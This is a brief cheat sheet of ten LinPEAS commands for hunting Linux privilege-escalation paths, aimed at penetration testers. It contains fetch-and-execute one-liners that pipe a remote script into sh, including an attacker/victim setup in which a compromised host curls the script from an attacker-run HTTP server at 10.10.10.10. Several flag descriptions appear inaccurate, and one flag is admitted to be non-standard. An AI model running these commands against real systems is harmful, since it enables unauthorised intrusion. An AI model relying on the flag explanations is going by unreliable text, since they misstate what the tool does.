Linpeas Command List
LinPEAS Command Guide
LinPEAS (Linux Privilege Escalation Awesome Script) checks for known potential paths to escalate privileges on Linux/Unix hosts.
Top 10 Useful Commands
1. Execute from Web (Fileless)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Explanation: Download and run immediately in RAM.
2. Standard Run
./linpeas.sh
Explanation: Run the script (must be chmod +x).
3. All Checks
./linpeas.sh -a
Explanation: Run extensive tests (takes longer).
4. Output to File
./linpeas.sh > output.txt
Explanation: Save logs (Output includes color codes, can be messy to read raw, see #5).
5. Output Readable
./linpeas.sh | tee output.txt
Explanation: See it on screen AND save it. Use less -r output.txt to view colors.
6. Search Password
./linpeas.sh -s
Explanation: Search fast, focus on password files.
7. Networking Info
./linpeas.sh -N
Explanation: Focus on network enumeration.
8. Quiet Mode
./linpeas.sh -q
Explanation: Only print things that are highly likely to be vulnerabilities (Red/Yellow).
9. Enumeration Server
# (Attacker)
python3 -m http.server 80
# (Victim)
curl 10.10.10.10/linpeas.sh | sh
10. Report mode
./linpeas.sh -o
# (Not standard flag, but common request)
The Most Powerful Command
./linpeas.sh
Explanation: Just run it. The power is in the COLOR CODING. RED/YELLOW text means "95% Probable Privilege Escalation path" (e.g., a SUID binary or bad Kernel).